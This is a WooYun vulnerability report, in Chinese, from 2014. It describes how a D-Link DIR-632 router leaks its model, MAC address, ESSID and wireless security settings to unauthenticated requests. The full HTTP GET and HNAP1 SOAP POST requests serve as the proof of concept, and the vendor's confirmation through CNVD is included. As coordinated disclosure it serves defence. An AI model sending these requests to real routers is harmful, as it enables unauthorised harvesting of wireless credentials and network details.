当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
D-Link某款路由发送特定POST包可获取essid等信息
相关厂商:
漏洞作者:
提交时间:
2014-07-18 15:06
修复时间:
2014-10-16 15:08
公开时间:
2014-10-16 15:08
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2014-07-18: 细节已通知厂商并且等待厂商处理中
2014-07-23: 厂商已经确认,细节仅向厂商公开
2014-07-26: 细节向第三方安全合作伙伴开放
2014-09-16: 细节向核心白帽子及相关领域专家公开
2014-09-26: 细节向普通白帽子公开
2014-10-06: 细节向实习白帽子公开
2014-10-16: 细节向公众公开

简要描述:

D-Link某款路由发送特定POST包可获取essid等信息

详细说明:

型号:

var CMOm17n_lang="EN";
var CMOmodel_name="DIR-632";
var CMOhw_version="A1";
var CMOversion="1.04";
var CMOwlan0_mode="rt";
var CMOmanufacturer = "D-Link";


获取型号:

GET /frame.cmo HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 地址:8080


获取mac等信息

POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 387
SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSettings"
Host: 地址:8080
Accept: text/html, */*
Accept-Encoding: deflate, gzip, identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/">
<RadioID>RADIO_24GHz</RadioID>
</GetWLanRadioSettings>
</soap:Body>
</soap:Envelope>


获取essid等信息

POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 387
SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"
Host: 地址:8080
Accept: text/html, */*
Accept-Encoding: deflate, gzip, identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/">
<RadioID>RADIO_24GHz</RadioID>
</GetWLanRadioSecurity>
</soap:Body>
</soap:Envelope>

漏洞证明:

qwe0.jpg


qwe1.jpg


qwe2.jpg

修复方案:

联系厂商

版权声明:转载请注明来源 YY-2012@乌云


>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-07-23 08:24

厂商回复:

cnvd未直接在实例和本地复现,根据图片确认,由cnvd按以往联系渠道向友讯中国公司通报。

最新状态:

暂无